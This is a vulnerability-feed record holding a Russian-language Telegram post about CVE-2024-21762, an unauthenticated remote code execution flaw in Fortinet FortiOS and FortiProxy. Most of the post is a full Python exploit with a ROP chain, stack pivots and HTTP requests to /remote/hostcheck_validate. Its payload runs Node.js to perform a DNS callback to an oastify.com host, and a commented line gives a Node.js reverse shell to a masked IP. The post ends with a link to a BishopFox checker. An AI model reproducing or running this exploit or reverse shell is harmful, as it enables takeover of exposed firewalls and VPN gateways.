{"uuid": "51b26fbf-6461-4840-aeef-226b3ce845f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/poxek/4184", "content": "Fortinet FortiOS & FortiProxy Unauthorized RCE CVE-2024-21762\n#RCE #CVE #Fortinet #FortiOS #FortiProxy\n\nCVE-2024-21762 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u043f\u0438\u0441\u0438 \u0437\u0430 \u0433\u0440\u0430\u043d\u0438\u0446\u044b \u0431\u0443\u0444\u0435\u0440\u0430 (buffer overflow) \u0432 Fortinet FortiOS \u0438 FortiProxy. \u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 HTTP-\u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432.\n\n\u27a1\ufe0f\u0410\u0442\u0430\u043a\u0443\u0435\u043c\u044b\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b:\n- FortiOS\n- FortiProxy\n\n\u042d\u043a\u0441\u043f\u043b\u043e\u0439\u0442:\nimport socket\nimport time\nimport argparse\n\n\nTARGET = 'xxxxxxxxxxxx' # Target IP\nPORT = 443 # Target port, usually 443 for SSL VPN\n\ndef make_sock(target, port):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((target, port))\n return sock\n\ndef send_payload(payload, target, port):\n with make_sock(target, port) as ssock:\n ssock.sendall(payload)\n\ndef main():\n ssl_do_handshake_ptr = b\"%60%ce%42%00%00%00%00%00\"\n getcwd_ptr = b\"%70%62%2c%04%00%00%00%00\"\n\n pivot_1 = b\"%52%f7%fd%00%00%00%00%00\" # push rdi; pop rsp; ret;\n pivot_2 = b\"%ac%c9%ab%02%00%00%00%00\" # add rsp, 0x2a0; pop rbx; pop r12; pop rbp; ret;\n\n rop = b\"\"\n rop += b\"%c6%e2%46%00%00%00%00%00\" # push rdi; pop rax; ret;\n rop += b\"%19%6f%4d%01%00%00%00%00\" # sub rax, 0x2c8; ret;\n rop += b\"%8e%b2%fe%01%00%00%00%00\" # add rax, 0x10; ret;\n rop += b\"%63%db%ae%02%00%00%00%00\" # pop rcx; ret;\n rop += b\"%00%00%00%00%00%00%00%00\" # zero rcx\n rop += b\"%38%ad%98%02%00%00%00%00\" # or rcx, rax; setne al; movzx eax, al; ret;\n\n rop += b\"%c6%52%86%02%00%00%00%00\" # shl rax, 4; add rax, rdx; ret;\n rop += b\"%6e%d0%3f%01%00%00%00%00\" # or rdx, rcx; ret; - rdx is zero so this is a copy\n rop += b\"%a4%df%98%02%00%00%00%00\" # sub rdx, rax; mov rax, rdx; ret;\n\n rop += b\"%f5%2c%e6%00%00%00%00%00\" # sub rax, 0x10; ret;\n rop += b\"%e4%e6%d7%01%00%00%00%00\" # add rsi, rax; mov [rdi+8], rsi; ret;\n\n rop += b\"%10%1b%0a%01%00%00%00%00\" # push rax; pop rdi; add eax, 0x5d5c415b; ret;\n rop += b\"%25%0f%8d%02%00%00%00%00\" # pop r8; ret; 0x028d0f25\n rop += b\"%00%00%00%00%00%00%00%00\" # r8\n\n pivot_3 = b\"%e0%3f%4d%02%00%00%00%00\" # add rsp, 0xd90; pop rbx; pop r12; pop rbp; ret;\n\n call_execl = b\"%80%c1%43%00%00%00%00%00\"\n\n bin_node = b\"/bin/node%00\"\n e_flag = b\"-e%00\"\n ## use this one for rev shell b'(function(){var net%3drequire(\"net\"),cp%3drequire(\"child_process\"),sh%3dcp.spawn(\"/bin/node\",[\"-i\"]);var client%3dnew net.Socket();client.connect(1337,\"xxxxxxxxxxx\",function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;})();%00'\n js_payload = b'(function(){var cp=require(\"child_process\");cp.execSync(\"nslookup xxxxxxxxxxx.oastify.com\");})();%00'\n\n form_value = b\"\"\n form_value += b\"B\"*11 + bin_node + b\"B\"*6 + e_flag + b\"B\"*14 + js_payload\n form_value += b\"B\"*438 + pivot_2 + getcwd_ptr\n form_value += b\"B\"*32 + pivot_1\n form_value += b\"B\"*168 + call_execl\n form_value += b\"B\"*432 + ssl_do_handshake_ptr\n form_value += b\"B\"*32 + rop + pivot_3\n body = (b\"B\"*1808 + b\"=\" + form_value + b\"&\")*20\n\n data = b\"POST /remote/hostcheck_validate HTTP/1.1\\r\\n\"\n data += b\"Host: \" + TARGET.encode() + b\"\\r\\n\"\n data += b\"Content-Length: \" + str(len(body)).encode() + b\"\\r\\n\"\n data += b\"\\r\\n\"\n data += body\n\n send_payload(data, TARGET, PORT)\n\n # Short delay to ensure the server processes the first request\n time.sleep(2)\n\n # Preparing and sending the second part of the exploit\n data = b\"POST / HTTP/1.1\\r\\n\"\n data += b\"Host: \" + TARGET.encode() + b\"\\r\\n\"\n data += b\"Transfer-Encoding: chunked\\r\\n\"\n data += b\"\\r\\n\"\n data += b\"0\"*4137 + b\"\\0\"\n data += b\"A\"*1 + b\"\\r\\n\\r\\n\"\n\n send_payload(data, TARGET, PORT)\n\nif __name__ == \"__main__\":\n main()\n\n\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u044b\u0435 \u0440\u0435\u0441\u0435\u0440\u0447\u0438 \u043c\u043e\u0436\u0435\u0442\u0435 \u043d\u0430\u0439\u0442\u0438 \u0422\u0423\u0422, \u0422\u0423\u0422, \u0422\u0423\u0422\n\n\u0421\u043a\u0440\u0438\u043f\u0442 \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0432\u0430\u0448\u0435\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430\nhttps://github.com/BishopFox/cve-2024-21762-check\n\ngit clone https://github.com/BishopFox/cve-2024-21762-check; cd cve-2024-21762-check; python3 check-cve-2024-21762.py \n\n\n\ud83c\udf1a @poxek", "creation_timestamp": "2024-07-03T13:01:41.000000Z"}